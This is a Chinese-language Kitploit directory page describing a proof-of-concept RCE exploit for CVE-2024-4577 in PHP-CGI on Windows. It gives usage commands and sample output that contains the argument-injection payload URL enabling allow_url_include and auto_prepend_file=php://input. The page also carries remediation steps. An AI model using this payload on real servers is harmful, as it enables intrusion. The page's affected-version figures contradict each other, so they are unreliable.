Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-4577 — PHP <8.2.15(Windows)中关键漏洞的概念验证 RCE 漏洞利用,允许攻击者执行任意命令。 | Kitploit
工具/GitHubGitHub/manuelinfosec/cve-2024-4577
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubmanuelinfosec/cve-2024-4577

CVE-2024-4577

PHP <8.2.15(Windows)中关键漏洞的概念验证 RCE 漏洞利用,允许攻击者执行任意命令。

查看仓库
912年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-4577:PHP CGI 配置中的严重漏洞

PHP 的 CGI 模式存在一个严重的安全漏洞,攻击者可以通过操控 URL 参数来运行任意命令。

受影响版本

  • Windows 上运行 php-cgi 的 PHP 7.4.29 之前及 8.0.19 之前的版本。

攻击方法

  • 攻击者可以通过向 PHP CGI 脚本发送特制请求来利用此漏洞。这些请求会注入恶意参数,从而允许执行任意命令。这可能导致系统完全沦陷。

使用说明

先决条件

在运行脚本之前,请确保系统中已安装 Python 3。此外,你需要 requests 库来处理 HTTP 请求。

安装依赖

你可以使用 pip 安装所需的依赖。如果未安装 pip,请按照此处的说明进行操作。

  1. 打开终端或命令提示符。
  2. 运行以下命令安装 requests 库:
root@kitploit:~
pip install requests

运行脚本

要检查目标 URL 是否存在 CVE-2024-4577 漏洞,请按照以下步骤操作:

  • 使用 python3 执行脚本,并以目标 URL 作为参数。
root@kitploit:~
python3 exploit.py <target>

例如,要测试 URL http://example.com,请运行:

root@kitploit:~
python3 exploit.py http://example.com

脚本输出

脚本将测试提供的目标 URL 是否存在漏洞,并将结果打印到控制台。它将指示是否发现了潜在漏洞,或者是否未检测到漏洞。

root@kitploit:~
(+) Potential vulnerability found at: http://example.com/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
(-) No vulnerability found at: http://example.com/php-cgi/php-cgi.exe?%ADd+allow_url_include

修复步骤

  1. 将 PHP 更新到最新版本。
  2. 确保输入参数经过适当的清理和验证。
  3. 应用安全配置设置以限制 CGI 参数处理。

致谢

此漏洞由 Orange Tsai (@orange_8361) 发现。

下载工具